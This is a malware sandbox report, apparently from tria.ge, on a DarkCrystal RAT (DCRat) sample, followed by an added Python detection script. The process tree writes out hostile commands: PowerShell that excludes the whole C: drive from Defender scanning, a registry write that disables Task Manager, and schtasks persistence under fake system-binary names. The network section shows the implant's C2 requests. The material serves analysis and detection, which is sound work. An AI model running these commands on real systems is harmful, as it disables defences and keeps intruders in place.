Analysis

  • max time kernel
    121s
  • max time network
    123s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64 arch:x86 image:win7-20240903-en locale:en-us os:windows7-x64 system
  • submitted
    2024-12-07 17:24 UTC

General

  • Target

    2f7a0b0d633254c477f9d8650d485d11.exe

  • Size

    1.8MB

  • MD5

    2f7a0b0d633254c477f9d8650d485d11

  • SHA1

    1ce7e5c3989077d2965d9aac2a256f9930e5b98f

  • SHA256

    4a7e93517c69ba331bd816159caa16524903ea49a8a2ea2b01e89f744894e6f0

  • SHA512

    b6141e51687d39942fb04f593c7bb2c0a7ec9e0bc53200f22e4d4c94fdb5ce55aed3169ca35d014fb746089bd2087f585ad3f057931642650ff0063195054299

  • SSDEEP

    49152:VbA3GzW8NA/VUPoFVwrIIV+DJGfZ19qigh:Vbs8NA/VUPoXIV+Dwbwfh

Malware Config

Signatures

  • DcRat

    DarkCrystal (DCRat) is a .NET RAT, active since June 2019, that can load additional plugins.

  • Dcrat family
  • Process spawned unexpected child process 24 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • UAC bypass 3 TTPs 9 IoCs
  • DCRat payload 4 IoCs

    Detects payload of DCRat, commonly dropped by NSIS installers.

  • Command and Scripting Interpreter: PowerShell 1 TTPs 13 IoCs

    Runs PowerShell to change Windows Defender settings, adding exclusions for file extensions, paths, or processes. In this run every excluded path is the drive root or a top-level folder of C:, which amounts to excluding the whole system drive from scanning.

  • Disables Task Manager via registry modification
  • Executes dropped EXE 3 IoCs
  • Loads dropped DLL 2 IoCs
  • Checks whether UAC is enabled 1 TTPs 6 IoCs
  • Drops file in Program Files directory 4 IoCs
  • Drops file in Windows directory 5 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 4 IoCs

    Attempts to gather information about the victim system's language in order to infer the geographical location of the host.

  • Modifies registry key 1 TTPs 1 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 24 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 56 IoCs
  • Suspicious use of AdjustPrivilegeToken 16 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • System policy modification 1 TTPs 9 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Users\Admin\AppData\Local\Temp\2f7a0b0d633254c477f9d8650d485d11.exe
    "C:\Users\Admin\AppData\Local\Temp\2f7a0b0d633254c477f9d8650d485d11.exe"
    1⤵
    • System Location Discovery: System Language Discovery
    • Suspicious use of WriteProcessMemory
    PID:2684
    • C:\Windows\SysWOW64\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\CombrowserSavesInto\8XvFTVLpT5xtXdrooGsphRu.vbe"
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:2696
      • C:\Windows\SysWOW64\cmd.exe
        cmd /c ""C:\CombrowserSavesInto\gFc2W3El0.bat" "
        3⤵
        • Loads dropped DLL
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:2560
        • C:\CombrowserSavesInto\Crtmonitor.exe
          "C:\CombrowserSavesInto\Crtmonitor.exe"
          4⤵
          • UAC bypass
          • Executes dropped EXE
          • Checks whether UAC is enabled
          • Drops file in Program Files directory
          • Drops file in Windows directory
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          • System policy modification
          PID:2676
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "powershell" -Command Add-MpPreference -ExclusionPath 'C:/'
            5⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:2152
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "powershell" -Command Add-MpPreference -ExclusionPath 'C:/$Recycle.Bin/'
            5⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:2340
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "powershell" -Command Add-MpPreference -ExclusionPath 'C:/CombrowserSavesInto/'
            5⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:1304
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Documents and Settings/'
            5⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:1536
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "powershell" -Command Add-MpPreference -ExclusionPath 'C:/MSOCache/'
            5⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:1788
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "powershell" -Command Add-MpPreference -ExclusionPath 'C:/PerfLogs/'
            5⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:1596
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files/'
            5⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:2488
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files (x86)/'
            5⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:1840
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "powershell" -Command Add-MpPreference -ExclusionPath 'C:/ProgramData/'
            5⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:700
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Recovery/'
            5⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:912
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "powershell" -Command Add-MpPreference -ExclusionPath 'C:/System Volume Information/'
            5⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:268
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Users/'
            5⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:1124
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Windows/'
            5⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:1916
          • C:\MSOCache\All Users\conhost.exe
            "C:\MSOCache\All Users\conhost.exe"
            5⤵
            • UAC bypass
            • Executes dropped EXE
            • Checks whether UAC is enabled
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            • System policy modification
            PID:2424
            • C:\Windows\System32\WScript.exe
              "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\45fe8428-9bcd-46b3-9225-40238c613f0c.vbs"
              6⤵
                PID:2372
                • C:\MSOCache\All Users\conhost.exe
                  "C:\MSOCache\All Users\conhost.exe"
                  7⤵
                  • UAC bypass
                  • Executes dropped EXE
                  • Checks whether UAC is enabled
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  • System policy modification
                  PID:1792
              • C:\Windows\System32\WScript.exe
                "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fb8a7b06-2a8c-4714-a33c-25dd0b3a1cd2.vbs"
                6⤵
                  PID:780
            • C:\Windows\SysWOW64\reg.exe
              reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
              4⤵
              • System Location Discovery: System Language Discovery
              • Modifies registry key
              PID:2756
      • C:\Windows\system32\schtasks.exe
        schtasks.exe /create /tn "smsss" /sc MINUTE /mo 11 /tr "'C:\CombrowserSavesInto\smss.exe'" /f
        1⤵
        • Process spawned unexpected child process
        • Scheduled Task/Job: Scheduled Task
        PID:1932
      • C:\Windows\system32\schtasks.exe
        schtasks.exe /create /tn "smss" /sc ONLOGON /tr "'C:\CombrowserSavesInto\smss.exe'" /rl HIGHEST /f
        1⤵
        • Process spawned unexpected child process
        • Scheduled Task/Job: Scheduled Task
        PID:2632
      • C:\Windows\system32\schtasks.exe
        schtasks.exe /create /tn "smsss" /sc MINUTE /mo 6 /tr "'C:\CombrowserSavesInto\smss.exe'" /rl HIGHEST /f
        1⤵
        • Process spawned unexpected child process
        • Scheduled Task/Job: Scheduled Task
        PID:2900
      • C:\Windows\system32\schtasks.exe
        schtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 8 /tr "'C:\Program Files (x86)\Adobe\Reader 9.0\Esl\WmiPrvSE.exe'" /f
        1⤵
        • Process spawned unexpected child process
        • Scheduled Task/Job: Scheduled Task
        PID:1432
      • C:\Windows\system32\schtasks.exe
        schtasks.exe /create /tn "WmiPrvSE" /sc ONLOGON /tr "'C:\Program Files (x86)\Adobe\Reader 9.0\Esl\WmiPrvSE.exe'" /rl HIGHEST /f
        1⤵
        • Process spawned unexpected child process
        • Scheduled Task/Job: Scheduled Task
        PID:1924
      • C:\Windows\system32\schtasks.exe
        schtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 9 /tr "'C:\Program Files (x86)\Adobe\Reader 9.0\Esl\WmiPrvSE.exe'" /rl HIGHEST /f
        1⤵
        • Process spawned unexpected child process
        • Scheduled Task/Job: Scheduled Task
        PID:536
      • C:\Windows\system32\schtasks.exe
        schtasks.exe /create /tn "explorere" /sc MINUTE /mo 11 /tr "'C:\Recovery\1a287102-69f6-11ef-b2ff-62cb582c238c\explorer.exe'" /f
        1⤵
        • Process spawned unexpected child process
        • Scheduled Task/Job: Scheduled Task
        PID:1836
      • C:\Windows\system32\schtasks.exe
        schtasks.exe /create /tn "explorer" /sc ONLOGON /tr "'C:\Recovery\1a287102-69f6-11ef-b2ff-62cb582c238c\explorer.exe'" /rl HIGHEST /f
        1⤵
        • Process spawned unexpected child process
        • Scheduled Task/Job: Scheduled Task
        PID:1000
      • C:\Windows\system32\schtasks.exe
        schtasks.exe /create /tn "explorere" /sc MINUTE /mo 9 /tr "'C:\Recovery\1a287102-69f6-11ef-b2ff-62cb582c238c\explorer.exe'" /rl HIGHEST /f
        1⤵
        • Process spawned unexpected child process
        • Scheduled Task/Job: Scheduled Task
        PID:276
      • C:\Windows\system32\schtasks.exe
        schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 13 /tr "'C:\MSOCache\All Users\conhost.exe'" /f
        1⤵
        • Process spawned unexpected child process
        • Scheduled Task/Job: Scheduled Task
        PID:1660
      • C:\Windows\system32\schtasks.exe
        schtasks.exe /create /tn "conhost" /sc ONLOGON /tr "'C:\MSOCache\All Users\conhost.exe'" /rl HIGHEST /f
        1⤵
        • Process spawned unexpected child process
        • Scheduled Task/Job: Scheduled Task
        PID:1708
      • C:\Windows\system32\schtasks.exe
        schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 14 /tr "'C:\MSOCache\All Users\conhost.exe'" /rl HIGHEST /f
        1⤵
        • Process spawned unexpected child process
        • Scheduled Task/Job: Scheduled Task
        PID:2256
      • C:\Windows\system32\schtasks.exe
        schtasks.exe /create /tn "taskhostt" /sc MINUTE /mo 6 /tr "'C:\Windows\Resources\Ease of Access Themes\taskhost.exe'" /f
        1⤵
        • Process spawned unexpected child process
        • Scheduled Task/Job: Scheduled Task
        PID:2720
      • C:\Windows\system32\schtasks.exe
        schtasks.exe /create /tn "taskhost" /sc ONLOGON /tr "'C:\Windows\Resources\Ease of Access Themes\taskhost.exe'" /rl HIGHEST /f
        1⤵
        • Process spawned unexpected child process
        • Scheduled Task/Job: Scheduled Task
        PID:1960
      • C:\Windows\system32\schtasks.exe
        schtasks.exe /create /tn "taskhostt" /sc MINUTE /mo 5 /tr "'C:\Windows\Resources\Ease of Access Themes\taskhost.exe'" /rl HIGHEST /f
        1⤵
        • Process spawned unexpected child process
        • Scheduled Task/Job: Scheduled Task
        PID:1968
      • C:\Windows\system32\schtasks.exe
        schtasks.exe /create /tn "smsss" /sc MINUTE /mo 10 /tr "'C:\Program Files (x86)\Microsoft Synchronization Services\ADO.NET\v1.0\smss.exe'" /f
        1⤵
        • Process spawned unexpected child process
        • Scheduled Task/Job: Scheduled Task
        PID:236
      • C:\Windows\system32\schtasks.exe
        schtasks.exe /create /tn "smss" /sc ONLOGON /tr "'C:\Program Files (x86)\Microsoft Synchronization Services\ADO.NET\v1.0\smss.exe'" /rl HIGHEST /f
        1⤵
        • Process spawned unexpected child process
        • Scheduled Task/Job: Scheduled Task
        PID:2160
      • C:\Windows\system32\schtasks.exe
        schtasks.exe /create /tn "smsss" /sc MINUTE /mo 6 /tr "'C:\Program Files (x86)\Microsoft Synchronization Services\ADO.NET\v1.0\smss.exe'" /rl HIGHEST /f
        1⤵
        • Process spawned unexpected child process
        • Scheduled Task/Job: Scheduled Task
        PID:2948
      • C:\Windows\system32\schtasks.exe
        schtasks.exe /create /tn "smsss" /sc MINUTE /mo 10 /tr "'C:\MSOCache\All Users\{90140000-0011-0000-0000-0000000FF1CE}-C\smss.exe'" /f
        1⤵
        • Process spawned unexpected child process
        • Scheduled Task/Job: Scheduled Task
        PID:2172
      • C:\Windows\system32\schtasks.exe
        schtasks.exe /create /tn "smss" /sc ONLOGON /tr "'C:\MSOCache\All Users\{90140000-0011-0000-0000-0000000FF1CE}-C\smss.exe'" /rl HIGHEST /f
        1⤵
        • Process spawned unexpected child process
        • Scheduled Task/Job: Scheduled Task
        PID:1900
      • C:\Windows\system32\schtasks.exe
        schtasks.exe /create /tn "smsss" /sc MINUTE /mo 6 /tr "'C:\MSOCache\All Users\{90140000-0011-0000-0000-0000000FF1CE}-C\smss.exe'" /rl HIGHEST /f
        1⤵
        • Process spawned unexpected child process
        • Scheduled Task/Job: Scheduled Task
        PID:1940
      • C:\Windows\system32\schtasks.exe
        schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 7 /tr "'C:\Windows\fr-FR\dllhost.exe'" /f
        1⤵
        • Process spawned unexpected child process
        • Scheduled Task/Job: Scheduled Task
        PID:1292
      • C:\Windows\system32\schtasks.exe
        schtasks.exe /create /tn "dllhost" /sc ONLOGON /tr "'C:\Windows\fr-FR\dllhost.exe'" /rl HIGHEST /f
        1⤵
        • Process spawned unexpected child process
        • Scheduled Task/Job: Scheduled Task
        PID:1616
      • C:\Windows\system32\schtasks.exe
        schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 6 /tr "'C:\Windows\fr-FR\dllhost.exe'" /rl HIGHEST /f
        1⤵
        • Process spawned unexpected child process
        • Scheduled Task/Job: Scheduled Task
        PID:2628
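
Read together, the process tree shows three things a detection engineer would want to catch from command lines alone: schtasks persistence that re-launches copies named after Windows system binaries (smss.exe, conhost.exe, dllhost.exe, taskhost.exe, explorer.exe, WmiPrvSE.exe) from non-system folders, every few minutes and again at logon with /rl HIGHEST; Defender exclusions added for the drive root and every top-level folder; and the DisableTaskMgr policy write. The Python below is an added example, not part of the tria.ge report, that applies those three rules to command lines copied from the tree above plus two constructed benign lines. The system-binary list, the system-directory allowlist and the 15-minute threshold are assumptions of the example.

```python
import shlex
from pathlib import PureWindowsPath

# Assumed reference data for the example (not from the report): binaries Windows only runs
# from the directories below, so the same file name anywhere else is a masquerade.
SYSTEM_BINARIES = {"smss.exe", "csrss.exe", "conhost.exe", "dllhost.exe", "taskhost.exe",
                   "explorer.exe", "wmiprvse.exe", "svchost.exe", "lsass.exe", "winlogon.exe"}
SYSTEM_DIRS = {r"c:\windows", r"c:\windows\system32", r"c:\windows\syswow64",
               r"c:\windows\system32\wbem"}
FAST_RELAUNCH_MINUTES = 15   # assumed threshold for "re-launches itself every few minutes"
BROAD_EXCLUSION_DEPTH = 1    # drive root (0) or a top-level folder such as C:\Users (1)


def tokens(cmdline):
    # Non-POSIX mode keeps backslashes and returns quoted args with their quotes; strip both
    # layers, because schtasks accepts the nested "'C:\path\x.exe'" form used in the tree above.
    return [t.strip('"').strip("'") for t in shlex.split(cmdline, posix=False)]


def schtasks_args(toks):
    want = {"/tn", "/tr", "/sc", "/mo", "/rl"}
    return {t.lower(): toks[i + 1] for i, t in enumerate(toks[:-1]) if t.lower() in want}


def exclusion_depth(path):
    # 'C:/' -> 0, 'C:/Users/' -> 1, 'C:/Dev/build/' -> 2 (either slash style)
    parts = [p for p in path.replace("/", "\\").split("\\") if p]
    return max(len(parts) - 1, 0)


def triage(cmdline):
    """Findings for one process command line; an empty list means nothing notable."""
    toks = tokens(cmdline)
    if not toks:
        return []
    exe = PureWindowsPath(toks[0]).name.lower()
    lowered = [t.lower() for t in toks]
    found = []
    if exe in ("schtasks", "schtasks.exe") and "/create" in lowered:
        a = schtasks_args(toks)
        name = a.get("/tn", "?")
        target = PureWindowsPath(a.get("/tr", ""))   # every /tr above is a bare exe path
        if target.name.lower() in SYSTEM_BINARIES and str(target.parent).lower() not in SYSTEM_DIRS:
            found.append(f"task {name!r}: system-binary name {target.name} outside system dirs ({target.parent})")
        if a.get("/rl", "").upper() == "HIGHEST":
            found.append(f"task {name!r}: /rl HIGHEST (runs with the highest available token)")
        mo = a.get("/mo", "")
        if a.get("/sc", "").upper() == "MINUTE" and mo.isdigit() and int(mo) <= FAST_RELAUNCH_MINUTES:
            found.append(f"task {name!r}: re-launch every {mo} min")
    elif exe in ("powershell", "powershell.exe", "pwsh", "pwsh.exe") and "add-mppreference" in lowered:
        for i, t in enumerate(lowered[:-1]):
            if t == "-exclusionpath" and exclusion_depth(toks[i + 1]) <= BROAD_EXCLUSION_DEPTH:
                found.append(f"Defender exclusion covers {toks[i + 1]!r} (drive root or top-level folder)")
    elif exe in ("reg", "reg.exe") and len(toks) > 2 and lowered[1] == "add":
        if lowered[2].endswith(r"\policies\system") and "disabletaskmgr" in lowered:
            found.append("reg add: DisableTaskMgr set under Policies\\System")
    return found


# Constructed sample: seven command lines copied from the process tree above and two
# benign controls at the end that the rules must leave alone.
SAMPLE = [
    r'''schtasks.exe /create /tn "smss" /sc ONLOGON /tr "'C:\CombrowserSavesInto\smss.exe'" /rl HIGHEST /f''',
    r'''schtasks.exe /create /tn "smsss" /sc MINUTE /mo 6 /tr "'C:\CombrowserSavesInto\smss.exe'" /rl HIGHEST /f''',
    r'''schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 13 /tr "'C:\MSOCache\All Users\conhost.exe'" /f''',
    r'''schtasks.exe /create /tn "dllhost" /sc ONLOGON /tr "'C:\Windows\fr-FR\dllhost.exe'" /rl HIGHEST /f''',
    "\"powershell\" -Command Add-MpPreference -ExclusionPath 'C:/'",
    "\"powershell\" -Command Add-MpPreference -ExclusionPath 'C:/CombrowserSavesInto/'",
    r'''reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f''',
    r'''schtasks.exe /create /tn "NightlyBackup" /sc DAILY /tr "C:\Program Files\Backup\backup.exe" /f''',
    "\"powershell\" -Command Add-MpPreference -ExclusionPath 'C:/Dev/build/'",
]


def report(lines):
    """Map each flagged command line to its findings (lines with none are omitted)."""
    out = {}
    for line in lines:
        findings = triage(line)
        if findings:
            out[line] = findings
    return out


if __name__ == "__main__":
    for line, findings in report(SAMPLE).items():
        print(line)
        for f in findings:
            print("   ->", f)
```

In a pipeline these strings would come from the CommandLine field of Sysmon Event ID 1 or Security Event ID 4688 (with command-line auditing enabled); the rules are deliberately string-based so they apply unchanged to EDR telemetry. Two caveats: Add-MpPreference only takes effect when run elevated, so the authoritative signal for an exclusion change is Defender's own Event ID 5007 in the Microsoft-Windows-Windows Defender/Operational log, and the allowlist above must be extended for any legitimate software that ships with a system-binary name.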

      Network

      • DNS (remote geolocated: US)
        a1056424.xsph.ru
        conhost.exe
        Remote address:
        8.8.8.8:53
        Request
        a1056424.xsph.ru
        IN A
        Response
        a1056424.xsph.ru
        IN A
        141.8.192.138
      • GET (remote geolocated: RU)
        http://a1056424.xsph.ru/95a8ba37.php?HrMsBo99TZCyxGcg3L6=FNpHggmEVePS1rn0&5vFbP6z=ukNDZvQ67f4CFMeC4nzJt7G&347b07e4e66713be0a21314e4922d859=858e460391fb5d573f4dcabbdbae854b&61dfaae7e95be6c0dec8d8d052d9e2f3=gYiNGO1MWOxMDN1QDMzcDZwQGZ1E2YjJmNzgjNhFGMlJDM1M2M2YWZ&HrMsBo99TZCyxGcg3L6=FNpHggmEVePS1rn0&5vFbP6z=ukNDZvQ67f4CFMeC4nzJt7G
        conhost.exe
        Remote address:
        141.8.192.138:80
        Request
        GET /95a8ba37.php?HrMsBo99TZCyxGcg3L6=FNpHggmEVePS1rn0&5vFbP6z=ukNDZvQ67f4CFMeC4nzJt7G&347b07e4e66713be0a21314e4922d859=858e460391fb5d573f4dcabbdbae854b&61dfaae7e95be6c0dec8d8d052d9e2f3=gYiNGO1MWOxMDN1QDMzcDZwQGZ1E2YjJmNzgjNhFGMlJDM1M2M2YWZ&HrMsBo99TZCyxGcg3L6=FNpHggmEVePS1rn0&5vFbP6z=ukNDZvQ67f4CFMeC4nzJt7G HTTP/1.1
        Accept: */*
        Content-Type: text/csv
        User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
        Host: a1056424.xsph.ru
        Connection: Keep-Alive
        Response
        HTTP/1.1 403 Forbidden
        Server: openresty
        Date: Sat, 07 Dec 2024 17:24:41 GMT
        Content-Type: text/html
        Transfer-Encoding: chunked
        Connection: keep-alive
        Vary: Accept-Encoding
      • GET (remote geolocated: RU)
        http://a1056424.xsph.ru/95a8ba37.php?HrMsBo99TZCyxGcg3L6=FNpHggmEVePS1rn0&5vFbP6z=ukNDZvQ67f4CFMeC4nzJt7G&347b07e4e66713be0a21314e4922d859=858e460391fb5d573f4dcabbdbae854b&61dfaae7e95be6c0dec8d8d052d9e2f3=gYiNGO1MWOxMDN1QDMzcDZwQGZ1E2YjJmNzgjNhFGMlJDM1M2M2YWZ&HrMsBo99TZCyxGcg3L6=FNpHggmEVePS1rn0&5vFbP6z=ukNDZvQ67f4CFMeC4nzJt7G
        conhost.exe
        Remote address:
        141.8.192.138:80
        Request
        GET /95a8ba37.php?HrMsBo99TZCyxGcg3L6=FNpHggmEVePS1rn0&5vFbP6z=ukNDZvQ67f4CFMeC4nzJt7G&347b07e4e66713be0a21314e4922d859=858e460391fb5d573f4dcabbdbae854b&61dfaae7e95be6c0dec8d8d052d9e2f3=gYiNGO1MWOxMDN1QDMzcDZwQGZ1E2YjJmNzgjNhFGMlJDM1M2M2YWZ&HrMsBo99TZCyxGcg3L6=FNpHggmEVePS1rn0&5vFbP6z=ukNDZvQ67f4CFMeC4nzJt7G HTTP/1.1
        Accept: */*
        Content-Type: text/csv
        User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
        Host: a1056424.xsph.ru
        Response
        HTTP/1.1 403 Forbidden
        Server: openresty
        Date: Sat, 07 Dec 2024 17:24:41 GMT
        Content-Type: text/html
        Transfer-Encoding: chunked
        Connection: keep-alive
        Vary: Accept-Encoding
      • 141.8.192.138:80
        http://a1056424.xsph.ru/95a8ba37.php?HrMsBo99TZCyxGcg3L6=FNpHggmEVePS1rn0&5vFbP6z=ukNDZvQ67f4CFMeC4nzJt7G&347b07e4e66713be0a21314e4922d859=858e460391fb5d573f4dcabbdbae854b&61dfaae7e95be6c0dec8d8d052d9e2f3=gYiNGO1MWOxMDN1QDMzcDZwQGZ1E2YjJmNzgjNhFGMlJDM1M2M2YWZ&HrMsBo99TZCyxGcg3L6=FNpHggmEVePS1rn0&5vFbP6z=ukNDZvQ67f4CFMeC4nzJt7G
        http
        conhost.exe
        3.2kB
        118.5kB
        47
        88

        HTTP Request

        GET http://a1056424.xsph.ru/95a8ba37.php?HrMsBo99TZCyxGcg3L6=FNpHggmEVePS1rn0&5vFbP6z=ukNDZvQ67f4CFMeC4nzJt7G&347b07e4e66713be0a21314e4922d859=858e460391fb5d573f4dcabbdbae854b&61dfaae7e95be6c0dec8d8d052d9e2f3=gYiNGO1MWOxMDN1QDMzcDZwQGZ1E2YjJmNzgjNhFGMlJDM1M2M2YWZ&HrMsBo99TZCyxGcg3L6=FNpHggmEVePS1rn0&5vFbP6z=ukNDZvQ67f4CFMeC4nzJt7G

        HTTP Response

        403

        HTTP Request

        GET http://a1056424.xsph.ru/95a8ba37.php?HrMsBo99TZCyxGcg3L6=FNpHggmEVePS1rn0&5vFbP6z=ukNDZvQ67f4CFMeC4nzJt7G&347b07e4e66713be0a21314e4922d859=858e460391fb5d573f4dcabbdbae854b&61dfaae7e95be6c0dec8d8d052d9e2f3=gYiNGO1MWOxMDN1QDMzcDZwQGZ1E2YjJmNzgjNhFGMlJDM1M2M2YWZ&HrMsBo99TZCyxGcg3L6=FNpHggmEVePS1rn0&5vFbP6z=ukNDZvQ67f4CFMeC4nzJt7G

        HTTP Response

        403
      • 8.8.8.8:53
        a1056424.xsph.ru
        dns
        conhost.exe
        62 B
        78 B
        1
        1

        DNS Request

        a1056424.xsph.ru

        DNS Response

        141.8.192.138

      MITRE ATT&CK Enterprise v15

      Downloads

      • C:\CombrowserSavesInto\8XvFTVLpT5xtXdrooGsphRu.vbe

        Filesize

        205B

        MD5

        f9aa9ba9ca708623a6d8eafcab82b460

        SHA1

        c75bfeade1de9cd48b255a60679a2afd045fd737

        SHA256

        0b51137a1e50b6fde4624ccff526ceb7a3fb911c811c45dcdd2fd30004993471

        SHA512

        31ef0b612045b9261ab91921336931c318e4ff853197c58d29e9741c86eeb4db859a97d413d92ac6d6d18fbeabd4ee4a1c8d4512f25468818421c4ce63a4c7a8

      • C:\CombrowserSavesInto\Crtmonitor.exe

        Filesize

        1.5MB

        MD5

        4667f5be1002ce912e5590cca8da93b6

        SHA1

        2e408e483dd447b69d2e938218989265fbfdc2af

        SHA256

        fcfa3c615b1c3c703e0ebfaf3fa68093b3894f4b9b7b5b37a5283e419f44022e

        SHA512

        cdc57befaf7bad8917cc885b394f37d9dac3beabca5d07ab74cfee24f076dc088c2631ad2176dd7b9e62c555692b4c51e3280d5cf5d432ea5172db4ab8fa8c7f

      • C:\CombrowserSavesInto\gFc2W3El0.bat

        Filesize

        151B

        MD5

        341c56654b4b916155226d31ae60c33b

        SHA1

        15625cf5fdc9c74cd7ab2df39433ec7a3e1587e8

        SHA256

        a5712bbb877663ebb6f017ecb478fe7c79337afa84dbda0b7b1c75120cf7b38d

        SHA512

        32509ecdeed2748d7e66d26b1d8927f6ab1ee98bd7e3c2b585c1ac697f9aaccb6efd44c0f8d30c70c8baebb1b4e07a51a5ce6e437ad155975b33a7dfe7dbf994

      • C:\Users\Admin\AppData\Local\Temp\45fe8428-9bcd-46b3-9225-40238c613f0c.vbs

        Filesize

        709B

        MD5

        5bdd8c2d729372ea2965c9bd8ffa73fd

        SHA1

        288779df924fdd8bb6ec0be2ef8474459dbe99ea

        SHA256

        b5ad624bfa756d7cf9b2ff9c669de4144174820c59901fe455a5e7a2ec0c7715

        SHA512

        ca10fefcece287c1b186a697cde93fc664eac371f080f657905468002354f33406c2f04566fad9e8faa29a4132311327ebc49bb06fd4ee876af2b788b821cbc0

      • C:\Users\Admin\AppData\Local\Temp\fb8a7b06-2a8c-4714-a33c-25dd0b3a1cd2.vbs

        Filesize

        485B

        MD5

        64a0b6e4c7bb63bc4f73cae7a4281af8

        SHA1

        68d858f41cbfd685babaeb847e8a879ea509ea47

        SHA256

        76eb5301567a1a174fde628fc4d59ebc270f1247eb7fb745f1cd3263cd296697

        SHA512

        0317d45fb5e8ba4dba2624284ee63de993dc2361a12cf40e842217a2fe66508723e7dd054bd6a7522071b13cce9b78f51ace943574ded6f2152b27f815cca607

      • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

        Filesize

        7KB

        MD5

        8b3b906e79b9a603039ebc5f02d9cf89

        SHA1

        1ec86b2c51976c7a889e2736f9c9b196d6e205eb

        SHA256

        13ab61720ae1a2e89610ea82530098a8d910fc654c5941fd8374ebc88a6b274f

        SHA512

        1b2516c77d1af39504fbc70c17b97523ea6dda4c542f3920edaf978131890af879d282c0fad680ab77b851979da22371444a801f072b43713d0170f623178fb1

      • memory/1792-124-0x00000000011E0000-0x000000000136E000-memory.dmp

        Filesize

        1.6MB

      • memory/2424-61-0x0000000000280000-0x000000000040E000-memory.dmp

        Filesize

        1.6MB

